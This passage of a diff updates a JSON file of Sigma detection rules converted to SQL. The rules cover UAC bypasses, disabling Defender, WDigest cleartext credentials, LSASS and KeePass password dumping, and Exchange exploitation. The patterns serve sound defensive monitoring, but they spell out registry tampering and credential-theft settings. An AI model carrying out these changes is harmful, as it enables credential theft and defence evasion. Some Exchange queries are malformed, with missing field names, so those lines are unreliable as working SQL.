'%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript 